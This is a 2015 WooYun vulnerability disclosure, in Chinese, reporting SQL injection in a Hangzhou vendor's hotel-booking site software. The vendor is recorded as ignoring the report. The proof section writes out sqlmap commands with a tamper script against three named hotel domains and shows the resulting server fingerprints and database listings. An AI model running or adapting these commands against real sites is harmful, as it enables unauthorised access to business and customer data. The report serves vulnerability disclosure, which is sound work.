当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095559

漏洞标题:浙江某网络科技有限公司旗下建站程序注射(涉及众多行业泄漏大量数据)

相关厂商:杭州桑弧网络科技有限公司

漏洞作者: 笑看天下

提交时间:2015-02-04 10:24

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

专业从事数据库设计、软件开发、信息集成、IT 规划与服务的高新科技企业。
我们是一支以博士、硕士为主力,由具备国际工作经验的高素质人才组成的结构合理的团队,吸收并融合了CMM和ISO9000的精髓。某科技团队将(对)欧、美、日软件外包项目中形成的严格标准和先进经验移植到产品的本土开发中,创建了自主开发的软件开发平台(软件生产线),团队的核心层具有长期国际一流软件企业研发与管理经验。
作为软件领域的先锋,XX科技一直以客户度身定做整体信息化解决方案为己任,结合国内企业的具体特性,制定了一套切实可行,高效科学的管理与质量体系,为客户提供高质 量的产品与专业服务。
我们始终秉承“技术领先,服务至上”的经营理念,立足传统优势行业,聆听市场前沿需求,结合最先进的技术,为客户提供最佳“绿色信息化平台”解决方案。公司一向以“重诺守信,严谨求是”为准则,追求与客户长期良好的合作,获取市场双赢,争做推动高科技产业的先驱。

详细说明:

杭州桑弧网络科技有限公司程序在众多服务酒店中出现sql注射漏洞 取了一下几个酒店 不光酒店 可能其他行业也会出现这种情况 需补天联系服务商推出解决方案
在酒店预定出普遍出现sql注射

漏洞证明:

第一次黑盒测试找到的,希望审核的各位大大 多多指点
这是他们的典型案例 我从这里面挑的:http://sanghu.cn/content_7.html
(1)歌特品轩酒店管理有限公司
115.238.54.104
sqlmap -u "http://www.getepinxuan.com/HotelDirectory/HotelDetail.aspx?storeId=571002" --tamper="apostrophemask.py" --dbs
[*] GT_soft
[*] GT_test1
[*] GTPXWebSite
[*] hMailServer
[*] HZYC_PMS
[*] KaiYuan
[*] LX_YC
[*] manguo
[*] manguowebsite
[*] master
[*] model
[*] msdb
[*] OKPms
[*] OKWechat
[*] PMS2013
[*] PMSONE
[*] shweb
[*] tempdb
[*] WLYJPms
[*] WLYJWechat
[*] XinPuWeb
[*] XP_web

123.png


(2)泊捷时尚连锁酒店
http://sanghu.cn/content_87.html?tag=4

1234.png


sqlmap -u "http://www.boozhotel.com/HotelDirectory/HotelDetail.aspx?storeId=598002&cityName=" --tamper="apostrophemask.py" -p storeId --dbs
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [14]:
[*] 20131009
[*] 20131010
[*] 2014-09-18
[*] 20140924
[*] BJ_test
[*] Bjtest_140626
[*] BJWEB
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] sanghu
[*] tempdb

12345.png


(3)城市名人酒店
./sqlmap.py -u "http://www.4008266333.com/trends_content.aspx?id=10002290" --dbs 这个应该也是他们搭的 请管理联系下他们确认下
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [48]:
[*] _CCH_Ticket
[*] _cchhotel
[*] _cchhotelshow
[*] _cchhoteltest
[*] _cchhoteltest1
[*] asset
[*] bar
[*] bbs_hrjy
[*] boss
[*] c
[*] ccheshop
[*] cchticket
[*] CRM
[*] crs
[*] Dish
[*] Dish_new
[*] dishtest
[*] hotel
[*] hotel_TAMRJD
[*] HR
[*] hrtest
[*] Investment
[*] jt_shop
[*] jtcardcount
[*] Jurisdiction
[*] lumigent
[*] master
[*] meeting
[*] model
[*] msdb
[*] mswy
[*] new1
[*] reportsystem
[*] Resource
[*] restaurant
[*] shop
[*] sms
[*] t_ticket
[*] taobao
[*] tempdb
[*] user
[*] Web_kskj
[*] weixing
[*] woofjia
[*] wx
[*] zcproject
[*] zhb
[*] zs_tz

123456.png

修复方案:

服务商整改下程序吧 该做过滤的地方做过滤

版权声明:转载请注明来源 笑看天下@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论